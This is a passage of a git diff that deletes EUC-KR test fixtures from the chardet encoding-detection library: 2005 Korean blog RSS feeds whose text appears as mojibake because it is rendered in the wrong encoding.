    -(1) ֱ₪÷¸¿ֽ ֱ₪÷¸µיְַ °°ט¸¦ ְְּ°ת´ֲ ´¸£°װ ֱ₪ְַַֿ´ֲ ´ֹ·ֲ
    -(2) ֱ₪÷¸ְַ ¸ֶ¶פְ» ¹²´ֲ ´ֹ·ֲ
    -
    -- ³כ´ֲ¸¸ֵ­ ¼÷°רַׁ´ סי -
    - ]]> - - ±¿ש - Sun, 25 Sep 2005 12:21:53 GMT - - - <![CDATA[ [2005.7.05] »ח¶ְ¸·־ ֳג¹ַֿ¶ף! ]]> - http://birder.egloos.com/1057986 - - ְּ³כ÷£ְֵּֽ¸¦ ¸¶ִ¡¸ח...
    -
    -±ט¿µ¼¼´ֲ ¼¼°טְְ¸·־ ¼÷°רַׁ µנְְּ³
    -
    -±׳÷׀ְַ µנְְ־¿¡ ´כַׁ ֱ₪ְַ
    -
    -±׳°¡ ֳ³ְ½ µנְְ־°ט¿¡ ְװ¹®ַֿ¸י¼­ µנְְ־ְ÷ ±ג¼ת¿¡¼­ ½ְֳµָ´°ם ¹ט¿´.
    -
    -¹ּ±¹¿¡¼­ µנְְּ³·־ ָ°µ¿ְ» ½ְֳַֿ¸ח 'µנְְ־'¿¡ ´כַׁ ֱ₪ְַ¸¦ ³»¸®´ֲ ְְֿ÷ ¹«ֳ´ְּ³× ָ¥¶ץ½÷¿´.
    -
    -±׳·±µ¥, ֱצ³×°ם ÷¸´ֿ ±׳ ±ג°£ µ¿¾ָ¿£ µנְְ־ְ÷ '»ף¼ת'ְּ¶ף°ם ְַּ״ַ´ר °ֽ °°´
    -
    -°ב±¹, ְּ³כµנְְ־ְ» ֳ¢¾קַֿ°ם ְִָּ 20¿©³ג°£ְַ ½ְַ °זַטְ» ֵכַא¼­ µנְְ־ְַ ±םְ÷ ¶זְ÷ ¹·־ 'ְ־¼ת'
    -
    -ְּ¶ף´ֲ ´¾מ ¼׃¿¡ ¼¾מ ְײ´´ֲ °ְֽ» ±ת´¾ׂ´.
    -
    -'»ח¶ְ¸·־ ֳג¹ַֿ¶ף!'

    -
    -ֶ®·»µו¸¦ ֳ¢ֱ¶ַֿ´ֲ ְ ְּ³כ÷£ְֵּֽ
    -±ט¿µ¼¼ ֱצְ½ / ֱ¾׃M&B(·£´‎ַֿ¿ל½÷ֱ¾׃)
    -
    -
    - - ]]> -
    - ְֿ»ףְַ ָ²ָ¦ - Tue, 5 Jul 2005 13:23:00 GMT -
    - - <![CDATA[ ¸®´ץ°¡ °®ֳח¾ַׂ 7°¡ֱצ ֱ¶°ַ (¸ְֵֿ°זֱ¦ 2005³ג 07¿ש 01ְֿ) ]]> - http://birder.egloos.com/1053379 - - -99³ג÷־ֵֽ FT¿¡ ִ®·³ְ» ±ג°םַׁ ·חֵ©´ֲ '´©°¡ ³» ÷ם·¢÷£¸®¸¦ ¿ֵ°ו¾מ?' ְתְְּ±גµµ ַֿ´.
    -
    -¡ ¸ְֵֿ¸ְֵֿ ¹ט¿צ¶ף£½¹ט¿עְ÷ ְ±גַץ½ְֵּ´.
    -ְט ְ£ִ¡ µמ ¼¼°טְ ±ג¾קְ־ְ÷ ¹°·׀ ¾מ÷־¿¡°װµµ ÷»¹ְ» °װ ְײ´.
    -ְּµיְ÷ °ן°ז¿¡¼­µµ ¹®ֱ¦¸¦ ַ״°בַֿ´ֲ ְֱַצ¿ֽ ַ״¹‎ ְ» ֱ¦½ֳַֿ±ג ¶§¹®ְּ´.
    -
    -¡ °סֱַ¸¦ ֳִ¶ף£½°סֱַ´ֲ ¾מ¶² ½÷ֶקֳק÷¸´ ֵ« °ז±גְו¿¡¼­ ַׁ ִ¡ ¿ְֲקµµ ¾ר´ֲ ¿ֿ ÷®ַׁ °בֱ₪ְ» ¿ה±¸ַֿ´ֲ °ז±ג´.
    -°סֱַ´ֲ ֱ‎ֱ·ְֲ» ±ג¸£°ם °זְןַֿ°ם ַש·ֲַֿ´ֲ ´כ ְ־°°ט¸¦ ¸¸µח´.
    -³×´ֲ ´©±¸µחֱצ °סֱַ¸¦ ַׁ ¹ר¸¸ ַװ²² ֳִ÷¸¸י ±׳°¡ ¾מ¶² ֱ¾·ש »ח¶קְ־ֱצ, ¶ַ ±׳¸¦ °ם¿כַׂ ¸¸ֱַׁצ¸¦ ¾ֻ ¼צ ְײ´.
    -
    -¡ ַ׳»ף °¡ֱ·ְ» ֳײ¿ל¼±ְ¸·־ ¿©°¶ף£½ ¹» »חָ¸»‎ָ°¿¡¼­µµ °¡ֱ·ְ» ַ׳»ף ֳײ¿ל¼± ְ¸·־ µײ¾ ַׁ´.
    -°¡ֱ·°ת ¸ײ¸® ¶³¾מֱ³ְ» ¶§¿¡´ֲ ְּ¸ְֿ µמְ¸·־ ְֱײ ¿¬¶פְ» ֱײ °ם¹¾ֶ¶ף.
    -
    -¡ ²ְ» ֳ£¾ֶ ½ַַצַֿ¶ף£½»ח¶קµיְ÷ ³×¿¡°װ 'Creovation(ֳ¢ֱ¶+ַץ½ֵ ַױ¼÷¾מ)'ְּ ¾מ¶² ְ¿כְ» ַֿ´ֱֲצ ¹¯°ן ַׁ´.
    -²ְ» ֳ£¾ֶ ½ַַצµַ°װ² ַֿ´ֲ °ְֽ¸·־ ְּ°ְּֽ ¹® ֱ¦ְַ ַ״¹‎ְ» ְּ²ר ¼צ ְײ´.
    -
    -¡ ¼÷½ַַֿ°ם ְ±¸®ְ(integethi cal)ְ¸·־ ַאµ¿ַֿ¶ף£½'integethic'ְ÷ ְ±¸®¿ֽ ¼÷½ְַ» ¸נµ־ ¾ֶ¿ל¸£´ֲ »ץ °³³הְּ´ .
    -'integethical'ַׁ »ח¶קְ÷ ¸¶ְ½¿¡¼­ ¿ל·¯³×¿ֲ °¡ִ¡¸¦ µ¸¥´.
    -¼¼°ט ֳײ°ם ±ג¾ק µיµµ ְּ °°ְ÷ ֳ¶ַ׀ְ» ָ°¿כַ״ ¾צֳ»³­ ְְּ±ְ» ¹ת¾מµי¿´´.
    -
    -¡ ִ×ֲשְַֿ£½¸®´ץ½ְ» ¼÷°רְְ¸·־ ְּ²ר±ג ְ§ַׁ ַ¼צ »חַ׳ ֱ ַֿ³×´.
    -¾מ¶² ְֿ ְ» ¼÷°רְ¸·־ ְּ²פ´ֲ µ¥ 120% ±ג¿©ַ´ץ¶ףµµ ¹µו½ֳ ֱײ÷¯ »ח¶קµי°ת ±׳ ¼÷°רְ» ³×´©°ם ±׳µי °ר·־¸¦ ֶע°¡ַֿ´ֲ
    -ֲֵµµ¸¦ ÷¸¿©¶ף.
    -
    -¡ °ג¼ױַ״¶ף£½±׳ µ¿¾ָ ¼צ¸¹ְ÷ ¼÷°ר ±ג¾קְ־ְ» ¸¸³×¸ח °ֲַׁ °ב°ת´.
    -¼÷°ר ±ג¾ק ְ־ְ÷ ³מ¶צ ¸¸ֵ­ ±׳µיְּ ְּ·י ¼÷°רְּ³× ¾קְ¿¡ °ג¼ױַׁ ְ¼¼¸¦ ÷¸ְ־´.
    -
    -[±ט¹־±¸ ±גְ]
    -< Copyright ¨ֿ ¸ְֵֿ°זֱ¦. ¹«´ְְח ¹׳ ְח¹טֶק ±ֱצ > - ]]> -
    - Scrap - Fri, 1 Jul 2005 00:02:56 GMT -
    - - <![CDATA[ ¼ׂ´ְַֿ ְְ÷ ³»÷־¿¡ ְײ¾ת´. (¸ְֵֿ°זֱ¦ 2005³ג 07¿ש 01ְֿ) ]]> - http://birder.egloos.com/1053374 - - -°³¹ַ״ ³ץ°םµµ ³»÷־ ÷־¼­°£ ְַ° ֲקְּ¿ֽ ִ¿¹ֲ´ְִֹּֿ¼ְַַ ¾מ·ֱ¿עְ¸·־ ·׀ִ× ½ֳ±ג µמְ» ³ץֳֶ±ג ¶§¹®ְּ¶ף°ם ֱצ³­´ 29ְֿ
    -(ַצֱצ½ֳ°£) ÷¸µµַ´.
    -
    -÷־¼­°£ °זְןְ» ÷־ֳ±ג´ֲ ±ג¾ק¹®ָ­·־ ְ־ַ״ ְַ»ח¼ֵׂכ¿¡ ¾מ·ֱ¿עְּ ִ¿ ½ֳ±ג¸¦ ³ץִ£ »ח·°¡ ¸¹¾ׂ´´ֲ °ְּֽ´.
    -
    -ְּ ½ֵ¹®ְ÷ ¼ׂ´ֿ°¡ ֱצ³­ַ״ ·׀ִ×ַ´ר ¿ֲ¶ףְ־ ְ½¾ַ ´¿מ·־µו ¼­÷ס½÷ְ־ 'ִ¿³״ֶ®'°¡ ½ֶַ׀ַׁ ¿רְ־ְ¸·־ ¼ׂ´ְַֿ ±ג¾ק¹®ָ­¸¦
    -²ֵ¾ׂ´.
    -
    -½ֱַ¦·־ ¼ׂ´ְַֿ ±ג¾ק±¸ֱ¶¸¦ »לֶל÷¸¸י »ח¾ק÷־÷°·־ ֱ¶ֱק ½ֳ½÷ְֵּ ±¸¼÷µַ¾מ ְײ´.
    -
    -°¢ ÷־¼­´ֲ ÷־¼­ ³»÷־ְַ ¾ק¹«¿¡¸¸ ½ֵ°זְ» ¾²°ם ´¸¥ ÷־¼­ְַ »ףָ²ְ» ְ ְַּ״ֱַֿצ ¸רַֿ°ם ְײ´ֲ °ְּֽ´.
    -
    -¿©±ג¿¡ ַ״´ח ÷־¼­°¡ ֱֳרַֿ´ֲ ¹זַג°ת ´¸¥ ¿ה±¸°¡ ֵ¸ ÷־¼­¿¡¼­ µי¾מ¿ְ¸י ְּ¸¦ ¹«½ֳַֿ´ֲ °ז¿ל°¡ ¸¹¾ֶ ¾ק¹«°¡ ָ¿ְ²ְְ¸·־
    -ֱֳרµֱַצ ¸רַֿ°ם ְײ´°ם WSJ´ֲ ֱצְ ַ´.
    -
    -ְּ °°ְ÷ ÷־¼­°£ ±«¸®°¨ְ÷ »ח³» °זְןְ» ±ְַוַ״¿ֲ ¼ׂ´ְַֿ ±ג¾ק¹®ָ­ ¶§¹®ְּ¶ף°ם W SJ´ֲ ¼³¸םַ´.
    -
    -¼ׂ´ֿ´ֲ ְּ °°ְ÷ »ח³» °זְןְ¸·־ ֳַ·¹ְּ½÷ֵ׳ְּ¼ַ°ת ¿צֵ©¸ַ µמְ» °³¹ַֿ´ֲµ¥ ¼÷°רַׁ ¹ ְײֱצ¸¸ ְֱּ¦´ֲ ֱצ³×ִ£ °זְןְ¸·־
    -ְ־ַ״ ÷ס½ֱַׁ ֱ¦ַ°ְּ ÷־ ¼­÷°·־ ֱ÷¹ ֳג½ֳµַ´ֲ °ז¿ל°¡ ´ֳ°ם ְײ´´ֲ °ְּֽ´.
    -
    -¼ׂ´ֿ´ֲ 1998³ג÷־ֵֽ ¿ֲ¶ףְ־ ְ½¾ַ½ְֳו¿¡ ֱרֳגַֿ´ֲ °ְֽ» °ם·ֱַ״ ¿װ´.
    -
    -´ח½ֳ ´כַ׀»‎µיְ÷ PC¿¡ ְתְוµָ ְ½¾ְַּ³× ¿µָ­ ְִֶֿ µמְ» ¿ֲ¶ףְ־»ף¿¡ ¿ֳ·ֱ °רְ¯ַֿ±ג ½ְֳַֿ°ם ְײ¾ת´.
    -
    -¼ׂ´ֿ´ֲ ְּ°°ְ÷ ¿עֱקְ׃ְ» ֶקֲרַֿ°ם µנֱצֵ׀ ְ½¾ַ±ג±ג¿ֽ ±ג¼תְ» °³¹ַ״ ֱ¦°רַׂ ¿¹ֱ₪ְּ¾תְ¸³× ´ח½ֳ ְ½¹»ח CBS·¹ִµו¸¦
    -÷¸ְ¯ַֿ°ם ְײ´ר ¼ׂ´ְַֿ ¹ּ±¹ »ח¾ק÷־¹®¿¡¼­ ְתְ±ִַ§ַ״ ¹®ֱ¦°¡ ַ״°בµֹ ¶§±מֱצ ·׀ִ×ְ» ÷¸·שַ״ ֱ °ְֽ» ¿ה±¸ַ״ ·׀ִ× ½ֳ±ג
    -¸¦ ¹ּ·י ¹ ְײ´.
    -
    -[ֱ¶ַצֱ₪ ±גְ]
    -< Copyright ¨ֿ ¸ְֵֿ°זֱ¦. ¹«´ְְח ¹׳ ְח¹טֶק ±ֱצ > - ]]> -
    - Scrap - Thu, 30 Jun 2005 23:54:03 GMT -
    - - <![CDATA[ [2003.6.30] Think Different ]]> - http://birder.egloos.com/1052052 - - -
    -'Think Different' ¹»°¡¿ה?
    -
    -ֳ³ְ½ְַ ¾ײְֳַ÷ ַ׳»ף ¾ױ¼­°¬½ְ´ֿ´. ±׳·¯³× ´כְְֱֱּצ ¾¾ׂ½ְ´ֿ´. ¾ֶ´ֿ, ´כְֱ» ¿¸י ֱַצ¿ה!
    -
    -ֱַֿצ¸¸, ֱצ±ְַ CEO(¿¹ְְַ ½÷ֶ¼÷ך ְג½÷°¡ ´½ֳ ¿װ´)´ֲ ´¶ף ֱ³½ְ´ֿ´.
    -
    -´©±¸÷¸´ ¸¹ְּ ¾ױ¼­ °¡ֱצ¸¸ ´כְֱ» ְּ²ר¾מ °¡°ם ְײ½ְ´ֿ´.
    -
    -ֳ³ְ½ְַ CEO´ֲ ¾ֱֶ‎ְ¸·־ ָ¸»ח¸¦ ְּ²ר¾ת´¸י...
    -
    - ַצְחְַ CEO´ֲ ½ְֳוְ» ´©±¸÷¸´ ¸ױְת ְ׀´ֲ ¼±±¸ְ°¡ µַ¾מ µ¹¾ֶ ¿ֲ°װ ¾ֶ´ׂ±מ! - ]]> -
    - ְֿ»ףְַ ָ²ָ¦ - Wed, 29 Jun 2005 15:28:05 GMT -
    - - <![CDATA[ ַ°ֱתְ÷ ±ג÷»! ]]> - http://birder.egloos.com/1052003 - - -
    -´©°¡ ´ץ ¸ױְת »¡¸® ½ְֳוְ» ֳ£´ֲ³ִ? ¾ױ¼­ °¡´ֲ³ִ!
    -
    -¾ױ¼­°£ ½ְֳוְ» ָ®½ֵ ַֿ´ְ³ִ?
    -
    -ֲ×¾ֱֶר ¶ףְֱַּ(life...or ½ְֳו)½÷ֵ¸ְֿ... ְ» ¾מ´ְ ´©°¡ ¼±µµַֿ´ְ³ִ°¡ ¾ֶ´ׂ·±ֱצ?
    -
    -.....
    -
    -ַ°ֱתְַ ֱ₪»ףְ» ַגַ״¼­ - ]]> -
    - ±ג³ֹ! - Wed, 29 Jun 2005 15:02:42 GMT -
    - - <![CDATA[ [2005.6.29] ÷ׂ¾ִֻ£±¸ְַ ¹ז¹® ^^; ]]> - http://birder.egloos.com/1051911 - - -
    -¿ְ´ְֳ÷ ¿ְ·¡ְ ִ£ַׁ ִ£±¸ְַ ְָ­ (¶ז ¹ְ־°ֹ!)
    -
    -¼±¸×ְּ¶ץ´(³»°¡ »ח´ֲ°ק). ¿ְֱַּֽ¿¡ ¾ײ±מֱצ µ¥¸®±¸¿ֽ¼­....(ְָ­»ף »ףָ² - ³­ ֲק¸¦ °¡ֱצ±¸ ¿װ°ֱצ! »‎°¢ַֿ¸י¼­ ³­ ¼ֱׂײְַַׁ״¾ֱצ! ַֿ´ֲ »‎°¢±מֱצ. ¹ִּ£³נ!)
    -
    -ְּ·± ¸׃¾... ֱצֳַֿ¶ֵ¸°ם ¿װ´´
    -
    -ְְְּֿײ¾מ¼­ µי·¶ֱצ¸¸ ¹°©´ ִ£±¸¾.
    -
    -¿ֳ¸¸¿¡ ¿ְֱַּֽ¿ֽ ¾ײ. ¸¹ְּ ִֶ¾מ. ¸¹ְּ ְּ»µֱצ°ם(ְ¿£ ³¹« ¸»¶ת¾תֱצ)
    -
    -
    -÷»·׀ ְ¸·־ µ¹¾ֶ¿ֽ¼­...
    -
    -»ח¶ַׁ´ ִ£±¸¾. °¡ְו ִ£ַׁ ִ£±¸°¡ ְ»ח±¸ ְײ´ֲ °ֹ÷¸´ֿ.
    -
    -ְֱײ ¿¬¶פַ״¾ ַֿ´ֲµ¥, ³»°¡ ¸»ְּ¾ ֱ» ³»¸¾µ¥·־ »ל¾ֶ¼­ ¸»ְּ¾!
    -
    -¾מ¶±ַֿ°¾מ...
    -
    -ֱײְ‎ ֱײְ‎.... ¼ת¸װ¾ת±÷.
    -
    -¾ֶֿ°, ¿ֳ¸¸¿¡ ¼ת~~~~~~~ ְ¸װ¾ת´. - ]]> -
    - ְֿ»ףְַ ָ²ָ¦ - Wed, 29 Jun 2005 13:38:22 GMT -
    -
    -
    diff --git a/chardet/tests/EUC-KR/blog.bd-lab.com.xml b/chardet/tests/EUC-KR/blog.bd-lab.com.xml deleted file mode 100644 index b44446f..0000000 --- a/chardet/tests/EUC-KR/blog.bd-lab.com.xml +++ /dev/null @@ -1,147 +0,0 @@ - - - - - -BDBLOG -http://blog.bd-lab.com/blog/ -°¡² ³×¸¦ µ¹¾ֶ÷¸´ֲ °ק -en-us -bongdang@bd-lab.co.kr -2005-11-21T13:05:42+09:00 - -hourly -1 -2000-01-01T12:00+00:00 - - -¿ְ·£¸¸¿¡ »חֱרֲן±ג -http://blog.bd-lab.com/blog/archives/000131.html -ְֿ¿הְֿ »ץ÷® 5½ֳ. ֶע¼ׂ °°ְ¸¸י ְ°ם ְײ°ֵ³× ¿ֲ¶ףְ־ °װְ׃ְ» ַֿ°ם ְײְ» ְּ ½ֳ°£¿¡ ְֿ¾מ³µ´. ¿ְ·£¸¸¿¡ µ¿ָ£ָ¸ »ח¶קµי ¸מ¸ם°ת »חֱרֳװ¿µְ» °¡±ג·־ ַ±ג ¶§¹®ְּ´. ¾ף¸¥ ¾ִ°ם ¹ּ¼‎°¡·ח¸¦ ֵ¸ ¸װְ÷ ִָ¿¡ ֱ‎ְ» ³×¼¹´. ¾ֱֶקְ÷ ±פ±פַֿ´. ¾א¼׃ְו¼ְׂ־ ֵ׳ֵ©³כ¸¶ֶ®¿¡ °¡´ֿ Lַ´װ¸¸ ³×¿ֽ °ט¼ּ´.Rַ´װְ÷ ֱקֱ¢ ֳװ¿µְו¼ׂ·־... -131@http://blog.bd-lab.com/blog/ -ֳכ¹ּ»‎ָ° -2005-11-21T13:05:42+09:00 - - -¼³¾ַ»ך °¡ְ»¿©ַא -http://blog.bd-lab.com/blog/archives/000130.html -ֱצ³­ ±¿הְֿ ְת³ב. ¾ף¸¥ ְְֿ» ¸¶ִ¡°ם ֱ‎ְ¸·־ ַגַ´. ´ַאָקµµ ±¿הְֿ¿¡ ְְֿ» ֳ³¸® ַ״¾ ַׂ ְְּֿ ¾ר¾ת´. H±÷ְּ ֶז¼ְַ» ¿¹¾אַ״ ³שֱצ¸¸ ָ₪½ֳ ַֿ´ֲ ¸¶ְ½¿¡ ִ§³¶ְ» ֳ¬°ו´. ֳ¬±ג´ֲ ±ט¿¡ ְּ°ֽ ְת°ֽ ֳ¬±ג´ ÷¸´ֿ ְֱצ ¾ְ÷ ְֱּ »‎°ו´. ¹°·׀ ְּ¹ר ¿©ַאְ» ְ§ַ״ »ץ·־... -130@http://blog.bd-lab.com/blog/ -»ל¸י¼­ -2005-10-24T15:53:11+09:00 - - -¿ֲ¶ףְ־ °װְ׃ -http://blog.bd-lab.com/blog/archives/000129.html -±׳µ¿¾ָ »ל¾ֶ¿ְ¸י¼­ ¿©·¯°¡ֱצ¿¡ ÷ֱ³¾ת´. ֳײ±¿¡´ֲ ¿ֲ¶ףְ־ °װְ׃¿¡ ÷ֱ® ְײ´. ¼ׂ´ֿ ¿ֲ¶ףְ־¿¡¼­ ¸¸µח ¿¡¹צִש½÷ֶ®2. ±׳µ¿¾ָ ¿©·¯°¡ֱצ ¿ֲ¶ףְ־ °װְ׃ְ» ַ״ ÷¼·ֱ°ם ³כ·ֱֲַצ¸¸, ³» ½÷ֵ¸ְֿ°ת ¸ֱֲצ ¾¾ֶ¼­ ֶק±ג ַ¾ת´. ֱַֿצ¸¸ ְּ °װְ׃ְ÷ ±׳³×¸¶ ¸¹ְּ ¸ֲ´ֲ´. ֶ¯ֱ₪ַׁ ·ךְ» ¿ה±¸ֱַֿצµµ ¾°ם, ¹«ֱ¶°ְְַ־ MOB»ח³ְֹ» °­¿הֱַֿצµµ ¾´ֲ´.... -129@http://blog.bd-lab.com/blog/ -ֳכ¹ּ»‎ָ° -2005-10-15T06:17:37+09:00 - - -°¡ְ ֱ¦ֱײµµ·־! -http://blog.bd-lab.com/blog/archives/000128.html -ֳ¼®ְּ´. ¿©´ְ¶§¿ֽ ¸¶ֲש°¡ֱצ·־ °¡ֱ·ְ» µ¥¸®°ם ֱ¦ֱײµµ¿¡ °£´. ¹°·׀ ³מ·¯°¡ ¾ֶ´ֿ¶ף ֲק·¸¦ ֱצ³»±ג ְ§ַ״¼­ֱצ¸¸, °םַג¿¡ °£´´ֲ °ְֽ÷ ¾נֱ¦³× ¸¶ְ½ְ» ¼³·¹°װ ַׁ´. ¿הֱעְ÷ ְּ»ףַֿ°װ ¿©ְ¯°¡ ¸¹ְּ ³×ֱצ ¾´ֲ´. ְּ ³×ְּ¿¡ ¿©ְ¯°¡ ³¹« ¸¹ְ÷ °ֽµµ ¹®ֱ¦°ֱצ¸¸ ¾ֻ¸ְּֽ ¾רְּ ¹» ¿הֱעְּ ֱֱֱצ´ֲ ¾´. ±זֱצ´ֲ... -128@http://blog.bd-lab.com/blog/ -»ל¸י¼­ -2005-09-16T14:43:04+09:00 - - -3ֱײ³ג -http://blog.bd-lab.com/blog/archives/000127.html -ֱצ³­ 8¿ש 14ְְּֿ ָ¸»ח¸¦ ¸¸µחֱצ 3³גְּ µַ´ֲ ³¯ְּ¾ת´. ÷ס·ֿ ְְ÷ ָ¸»חֱצ¸¸ 3³גְ» ²·ֱ¿װ´´ֲ°װ ½÷½÷·־ ½ֵ±גַֿ´. ¾ױְ¸·־µµ ְ ֱצ³¾ ¼צ ְײ±ג¸¦ ָס¸ֱַ״ ÷»´. ±׳³×ְת³× ְֱּ¦´ֲ ָ¸»חְַ ¾ְְֵֶּ» ֱ₪ַ״¾ַֿ´ֲµ¥...... -127@http://blog.bd-lab.com/blog/ -ָ¸»חְְֿ÷ ¹¹°¡ ´¸£ֱצ? -2005-08-19T13:42:47+09:00 - - -ֱײ¸»¾¿µ(2) -http://blog.bd-lab.com/blog/archives/000126.html -8¿ש ֳ¹ֱײ ¿×½ֳ ֱ₪½ֵ¾רְּ ¹»°װ ÷¸³ֲ´. 4ְֿ¹ד¿¡ ¿¹ֱ₪´כ·־ ¾מ¸׃´װְּ ¿ֳ¶ף¿ְ¼ּ°ם, 5ְֿ ¿ְְְ÷ °°ְּ ÷´¿ר¿¡¼­ °ֻ»ח¸¦ ַ´. ֶ¯÷°ַֿ°װ ֳֻ¹ַׁ ½ֳ°£ְ» ´ֵר »ףֲֵ´ֲ ¾ֶ´ֿ¾מ¼­ 24ְֿ¿¡ ֳ°¡ °ֱֻרְ» ¹±ג·־ ַֿ°ם ¾מ¸׃´װ²²¼­´ֲ 6ְֿ ְּ¸¥ ¿ְִָ ÷סַא±ג·־ ³»·ֱ °¡¼ּ´. ¾מ¸׃´װ°ת °רַ׳¿¡¼­ ÷סַא±ג ½ֳ°£ְ» ±ג´¸®¸י¼­ »‎°¢ַ״... -126@http://blog.bd-lab.com/blog/ -»ל¸י¼­ -2005-08-08T19:03:23+09:00 - - -ֱײ¸»¾¿µ(1) -http://blog.bd-lab.com/blog/archives/000125.html -7¿ש¸»°ת 8¿שֳ ֱײ¸»¿¡ ¿¬¼׃ְ¸·־ ¾¿µְ» ַ´. ֱ₪½ֵ¾רְּ ֱצ³»¸י¼­ ¿©ַאְ» ַׂ °טָ¹ְ» ¼¼¿לֱצµµ ¸רַֿ°ם ְײ¾תֱצ¸¸ ¸¶ְ½ ַׁ±¸¼®¿¡¼­´ֲ ¾נֱ¦³× ְ³גְַ ֱֱ¾ׂ´ר ±ג¾ןְ» ¶°¿ֳ¸®°ם ְײ¾ת´. °װ´°¡ ¿ֳַ״´ֲ ְ³גְַ ÷ֶׂםַװְ» ַ״¼ַׂ״ ÷¸°םְ ִ§³¶ְ» 2°³¸¦ ´ץ »ע°ם, °¡½÷·£ֵֿ µמ ¸מ°¡ֱצ ¼ַׂ°µµ ֳ°¡·־ ±¸ְװַ״ ³ץ°ם¼­ ¾נֱ¦µחֱצ... -125@http://blog.bd-lab.com/blog/ -»ל¸י¼­ -2005-08-08T18:25:18+09:00 - - -¾ָ¸יµµ -http://blog.bd-lab.com/blog/archives/000124.html -±׳µ¿¾ָ ְֿ¿¡ ֲׁ° °¡ֱצ ¸רַ´ר ¿©ַאְ» °¬´¿װ´. ¸סְֱצ´ֲ ¾ָ¸יµµ. ֵה¿הְֿ. ֱ¡½ְֹּ µַ±גְ¿¡ ½ִ±¸µיְ» ְחֳַֻ״¼­ ³×¼¹´. ³×¼­´ֿ ְּ¹ּ 12½ֳ´ֲ ³ׁ°ו´. ¼ִֶ³×µי¸ס¿¡¼­ ¿°ת¼רָ¯µµ·־¸¦ ֵ¸¼­ ¼­ַ״¾ָ °ם¼׃µµ·־·־ ַגַ´. ֶַ±³¸¦ ֱצ³×¸י¼­ ÷¸´ֿ ְּ¹ּ °ז÷־°ם¼׃µµ·־´ֲ ֳ¼ֱץְּ ½ַֹ´. ֱ¶³²÷׀±גֱ¡¿¡ µµ´ַֿ°ם ÷¸´ֿ ¿©±גµµ ¸¸¸¸ֱַֿצ ¾´. ´÷½÷¿¡ ְַַֿ¸י... -124@http://blog.bd-lab.com/blog/ -»ל¸י¼­ -2005-05-30T16:34:29+09:00 - - -³¡³µ´!! ³¡³µ³×?? -http://blog.bd-lab.com/blog/archives/000123.html -µוµנ¾מ ¿ְְֲַ» ַ´. µµ.½ֳ.¶פ. ְּ ¼­÷ס½÷ְַ PC ֵ¬¶ףְּ¾נֶ® ¸¸µו´ְ¶ף°ם °ם»‎ ¸¹ְּ ַ´. ¾ֱֶק ³¹«µµ ¹ָּםֱַֿצ¸¸, 3°³¿ש¿¡ ¸¸µח°ֵ ִ¡°ם´ֲ ÷ֱ ֱ¸¸ ַֿ´. UI¿¡ ֱ¶±¸¸ ½ֵ°זְ» ´ת ½טְ¸¸י ´ץ ´µכְ» ¼צ ְײ¾ת´ֲµ¥ ¾ֵָ¸±ץ´. ±׳µ¿¾ָ ¹ד ³·ְ» °ֵ²·־ »ל°ם »ח¹«½ַ¿¡µµ °ְֵַ ¿ְֱצ ¸רַׁ... -123@http://blog.bd-lab.com/blog/ -ֱַ·־±׳·¡¹ײ -2005-05-25T13:55:50+09:00 - - -¶ףְּ÷ך·¯¸® -http://blog.bd-lab.com/blog/archives/000122.html -¾מֱ¦ »ץ÷® 12½ֳ°¡ ֱ» ³ׁ¾מ¼­ '°©'ְּ ÷ׂ·¯¼­ '°©'ְּ ְּ ֱַ·־ֱ§ֶ®¸¦ ֵ׳½÷ֶ® ַֿ°ם ְײ´ֲ IDC¿¡ °¬´. '°©'ְּ ¿הֳ»ְ» ַֿ¿© ¿ל¸®°¡ »ח¿כַׁ ¶ַ ´¸¥ 'ְ»'ְּ ¸¸µח ¶ףְּ÷ך·¯¸® ¶§¹®ְּ¾ת´. 20ְְֿ÷ 1ֲק ¿ְְֲַּ ¿¹ֱ₪µָ ³¯ְּ¾ת°ם, ½ֳ°£ְ÷ 20ְֿ ¿ְְ 1½ֳ. ¸¸ 30½ֳ°£ְ» ³ׁ°װ ְבְ» ְֱצ... -122@http://blog.bd-lab.com/blog/ -ֱַ·־±׳·¡¹ײ -2005-05-21T09:35:06+09:00 - - -¿ר·¡´ֲ... -http://blog.bd-lab.com/blog/archives/000121.html -¿ְ´ְֳּ ¸¶ֱצ¸· ³¯ְּ´. ֱצ³­¹ר ¿¬±גµָ ִָ µ¹¾ֶ¿ְ´ֲ ¸¶ֱצ¸· ³¯. ֱַֿצ¸¸, ¿ְ´ְֳּ ֱ¾·בְְּֿ µֹ±מ? ¿ל¸®°¡ ¸ֳ°ם ְײ´ֲ ְֿµµ ְײֱצ¸¸, ¹´כֲ ְְֿ÷ ´ץ ¸¹ְּ µַ¾מ ְײֱצ ¾ְ÷ °ֽ °°ְ÷µ¥. »ף´כֶםְ÷ °ֵ²·־ »‎°¢ַֿ°ֱצ¸¸. ַַ°ןַֿ´. °ְֵַ µ־´ֲ° ¹ד»שְ¾קַֿ°ם, ¿ְ´ְֳ÷ ¸¶ֱצ¸·³¯ְּ¶ף°ם °ט¼׃ ¹צֶ¼°ם ְײ´. ֱ₪¸»... -121@http://blog.bd-lab.com/blog/ -³» ְַ° -2005-05-19T13:40:21+09:00 - - -¹ּ¾ַָֿ´ -http://blog.bd-lab.com/blog/archives/000120.html -¹ּ¾ַָֿ´ ¾ךµי¾ֶ. ´¸¥ ´µµ ¾ֶ´ֿ°ם °¡ֱ₪ְַ ´¿¡. ´¸¥ ³¯µµ ¾ֶ´ֿ°ם ¾מ¸°ְּ³¯¿¡µµ ³­ ְּ·¸°װ ְַֿֿ°ם ְײ±¸³×. ³ָסµיְּ ´ץ ֵ©±ג ְ¿¡ ´ץ ¸¹ְּ °°ְּ ְײ¾מ ֱײ°ם ½ְֽ÷µ¥, ±׳°װ ¸¾´כ·־ ¾ָµַ´ֲ±¸³×. ¾ֶ¸¶ ³ָסµיְַ ַׂ¾ֶ¹צֱצµµ ¾ֶ÷¿¡°װ ±׳·± ¸¶ְ½ְּ ְײ¾תְ»°ֽ °°´. ±׳·¸°װ ½ֳ°£ְּ ֱצ³×°ם ³×¸י... -120@http://blog.bd-lab.com/blog/ -»ל¸י¼­ -2005-05-05T06:06:01+09:00 - - -¿­¹´ֲ´ -http://blog.bd-lab.com/blog/archives/000119.html -ֱײ¸»¿¡ ¹דְ» ²¿¹»ץ¼­ ¼³ִ¡¹צְְ» ¸¸µי°ם ְ´ַ״ ֱב´. ְֿ´ ֵ׳½÷ֶ®¸¦ ½ְֳַ״¾ ַׁ´´ֿ ַֿ´ר°ְֽ» ְֿ´ ֱ₪¸®ַֿ°ם ¼¼¼¼ַׁ ÷־÷׀ְ÷ ´ח¿¬ָק ½ֵ°ז 